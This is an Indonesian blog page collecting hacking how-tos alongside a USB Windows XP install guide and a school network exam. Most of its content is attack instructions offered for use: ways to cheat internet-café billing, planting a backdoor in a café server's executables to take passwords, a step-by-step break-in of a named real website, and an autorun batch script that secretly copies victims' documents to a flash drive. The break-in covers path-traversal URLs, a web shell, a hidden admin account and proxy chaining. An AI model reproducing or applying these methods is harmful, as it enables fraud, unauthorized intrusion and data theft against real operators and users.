Translate

 
Selasa, 29 Maret 2011

The TOP Windows XP Tricks & Secrets!!

Senin, 28 Maret 2011

Cara Membobol Semua Jenis Billing atau Server Warnet

Membobol Semua Jenis Billing Warnet
Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia
Cara pertama
Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?
Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.
NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..
Cara kedua
1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008
gampangkan ?
Cara ketiga
Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.
Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan
Download Wincontrol –>> winctrl.exe untuk bypass login screen
Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.
Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.
Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net
Cara keempat
Alat yang dibutuhkan : – Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !
Praktek : – Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).
- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.
- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.
- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )
- Delete file original di komputer server (HHati – hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).
- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.
- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).
- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.
- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang – kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali..
- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat – lihat server warnet…OK

Langkah-Langkah membobol Server

Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini.

1.Persiapan hacking
2. Pemeriksaan bug
3. Mendownload source code dan file konfigurasi
4. Mengupload file explorer dan windows shell command interface
5. Mengambil-alih server

Saya akan menjelaskan langkah-langkah di atas satu per satu.
  1. Persiapan hackingSebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk     menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China.
  2. Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5: bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128 Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.2. Pemeriksaan bugPemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL: http://www.rasasayang.com.my/index.cfm??dir=download&menu=home&task=dl_comm&cfile= Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya. http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..%5Cdownload%5Cdl_comm.cfm Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut. Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.
  3. Mendownload source code dan file konfigurasiKita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya: http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..%5Capplication.cfmhttp://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..%5Cindex.cfm Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini. Selanjutnya kita download file konfigurasi web servernya dengan cara berikut: File konfigurasi IIS:http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:%5C&CFILE=..%5CWINDOWS%5Csystem32%5Cinetsrv%5CMetaBase.xml File konfigurasi CFM:http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:%5C&CFILE=..%5CCFusionMX7%5Clib%5Cneo-query.xml File History Internet Explorer untuk Administratorhttp://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:%5C&CFILE=..%5CDocuments and Settings\Administrator\Local Settings\History\History.IE5\index.dat Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/ Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb yang dapat kita download melalui:http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:%5C&CFILE=..%5Cwebuser%5Cweb%5Cpowerofpaytv.com%5C_db%5Cdcm_casbaa_db.mdb Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.
  4. Mengupload file explorer dan windows shell command interfaceDari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file. Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut: #Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), ' ', 'all')#
  5. Mengambil-alih serverKita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface. NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YESNET LOCALGROUP Administrators mbahjambon /ADD Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut: bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389 sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884
Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.

Kutipan: http://www.jasakom.com/index.php?categoryid=9&p2_articleid=569

Instalasi notetbook tanpa CD-ROM

Sebenarnya artikel ini sudah tersebar luas di internet. Ini kebetulan ada teman yang minta tolong Notebooknya (tanpa CD-ROM) untuk diminta install OS XP. Okelah kalau begitu ...kita langsung saja.

Tool / Software yang dibutuhkan :
1. Source installer XP (files ISO/CD Installer).
2. PEtoUSB (aplikasi untuk membuat flashdisk menjadi bootable)
3. usb_pre8 (aplikasi untuk memindahkan file-file XP ke USB != WARNING copas)

Step Pertama :
Extrak files PEtoUSB & usb_pre8 (direkomendasikan jadikan satu folder).

Step Kedua :
Jalankan program usb_pre8.cmd yang terdapat pada folder usb_pre8 dan jalankan PEtoUSB untuk memformat flashdisk dan menjadikan flashdisk agar bisa bootable.

Step Ketiga :
0 = pilih USB-stick (karena saya mengintallnya pada USB flashdisk)
1 = sesuaikan drive source XP (punya saya drive H)
2 = abaikan saja yang ini, ini fungsinya hanya buat drive temporary proses (sudah otomatis drive T)
3 = ubah sesuai drive flash disk anda (punya saya G)
Hanya empat hal tersebut yang perlu diubah / disesuaikan. Setelah itu pilih 4 untuk memprosesnya.



Step Keempat :
Anda akan diminta persetujuan format drive yg dijadikan temporary proses.



Step Kelima :
Tekan sembarang untuk melanjuti proses pembuatan localsource (pemindahan ke source ke space localhost)



Step Keenam :
Dan tekan sembarang tombol untuk menindaklanjuti proses.


lanjut.....


Step Ketujuh :
Pada saat proses nanti akan ada beberapa yang membutuhkan tindakan lanjut dengan menekan sembarang tombol. (jadi jgn ditinggal tidur ) kalau sudah selesai nanti akan ada pemberitauan sperti gambar dibawah ini.


Silahkan ditesting pada PC / laptop yg mensuport first boot pada USB.
Minggu, 27 Maret 2011

Mari belajar Paket Soal UKK TKJ 2010

1. Membangun Koneksi Wireless LAN (Membangun Hotspot)
Opsi konfigurasi :
- SSID Broadcast = No (SSID tidak dipublikasikan)
- SSID = nama_peserta
- Security Enable = Yes
- Security Type = WPA
Implementasikan topologi diatas dengan menggunakan media wireless lan untuk keperluan membangun hotspot sekolah untuk pengujian sharing perangkat keras, data dan perangkat lunak, dengan ketentuan pekerjaan :
a. Membuat perencanaan sesuai dengan topologi jaringan yang disediakan. Buat dokumentasi perencanaan meliputi seluruh perangkat yang digunakan dan pendukung konfigurasi :
- IP Address : 192.168.10.0/24
- SSID (No Broadcast) : [nama_peserta-jurusan]
- Security (WPA) : [nama peserta]
- Objek Guna Bersama :
1. Perangkat Keras :
2. Perangkat Lunak :
3. Data :
b. Melakukan konfigurasi Access Point
c. Perakitan dan Instalasi Server, Client
d. Melakukan instalasi dan konfigurasi jaringan sesuai topologi
e. Melakukan pengujian fungsi jaringan (sistem koneksi) dan sharing perangkat keras, data, dan perangkat lunak.

Implementasikan topologi diatas untuk melakukan pengujian fungsi Web Server dan DNS Server, dengan ketentuan :
a. Membuat perencanaan sesuai dengan topologi jaringan yang disediakan
b. Melakukan Perakitan dan Instalasi PC Client
c. Melakukan konfigurasi DNS Server dan Web Server
d. Melakukan instalasi implementasi sesuai topologi
e. Melakukan pengujian fungsi jaringan (sistem koneksi) dan pengujian aplikasi server.

2. Membangun DNS dan Web Server
Opsi konfigurasi :
IP Address
1. ns.sekolah.sch.id = 200.100.50.20/28
2. www.sekolah.sch.id = 200.100.50.25/28
3. jurusan.sekolah.sch.id = 200.100.50.25/28
4. PC Client = 200.100.50.30/28

DNS Server
2. SIstem Operasi = OSS (Linux/FreeBSD)
3. Domain = sekolah.sch.id
4. Email Admin = nama_peserta@sekolah.sch.id
5. Sub Domain = www.sekolah.sch.id
jurusan.sekolah.sch.id

Web Server
1. Sistem Operasi = OSS (Linux/FreeBSD)
2. Port Enable = 80
3. Virtual Host Enable = Yes
4. DocumentRoot =
www.sekolah.sch.id =/home/nama_peserta/sekolah/index.php
jurusan.sekolah.sch.id =/home/nama_peserta/jurusan/index.php


3. Membangun Firewall
Opsi konfigurasi :
- IP Address = 200.200.200.200/24
- Firewall = IP Tables
- Chains = lihat soal

Implementasikan topologi diatas untuk melakukan pengujian fungsi keamanan pada Server, dengan ketentuan :
a. Membuat perencanaan sesuai dengan topologi jaringan yang disediakan
b. Melakukan Perakitan dan Instalasi PC Client
c. Melakukan konfigurasi Server, dengan 3 konten aplikasi yang diijinkan untuk diakses meliputi :
a. Web Server, port 443
b. FTP Server, no anonymous
c. SSH Server, port 21212
Selain 3 konten tersebut diatas, tidak diijinkan lalu lintas terhadap mesin server
d. Melakukan instalasi dan konfigurasi Firewall, dengan ketentuan :
a. Sistem Operasi : OSS (Linux)
b. Firewall : IPTables
c. Chains :
Client : Dapat melakukan akses web, ftp dan ssh, selain dari itu tidak dijinkan.
Server : Dapat melayani permintaan web, ftp dan ssh, selain dari aplikasi itu tidak diijinkan
e. - Melakukan pengujian fungsi jaringan (sistem koneksi)
- Dapat menampilkan firewall chains
- Melakukan pengujian fungsi Firewall sesuai dengan skenario c dan d.

Hacker Music

Hackers and Crackers by Zearle

Mencuri Data menggunakan USB FlashDrive

1. Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..
@echo off
REM Name : silentxxx
REM Author : Silentxxx
Set silent=%computername% _ %random%
If not exist ”%silent%” Md “%silent%”
For%%a in (C D E F G H I J) do if exist %%a:\ (
For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f  “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
)


  1. Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon??
  2. Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..
Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode
For /f “tokens=*”  %%b in (‘dir /a/b/s%%a:\*.zip’)  do(
attrib –s –h –r  “%%b”
copy “%%b” “%silent%” /y)

maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)
ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf  atau *.html
maka file terserah.bat akan berjalan sesuai dengan keinginan anda .
File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5  kalau belum punya kakak-kakak bisa download di google
Cara mengubahnya adalah
  1. Buka software tersebut..
  2. Pilih yang compile
  3. Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
  4. Agar file tersebut maka kita harus buat file autorun
  5. Buka notepad ketikkan
[autorun]
Open=(sesuai nama yang kamu berikan).exe
  1. save as dengan nama Autorun.inf dan (sesuai nama yang kamu berikan).exe di dalam directory USB Flash Drive kamu..
  2. Selesai. . . . . 

Breaking News

« »
« »
« »
Get this widget

Updates Via E-Mail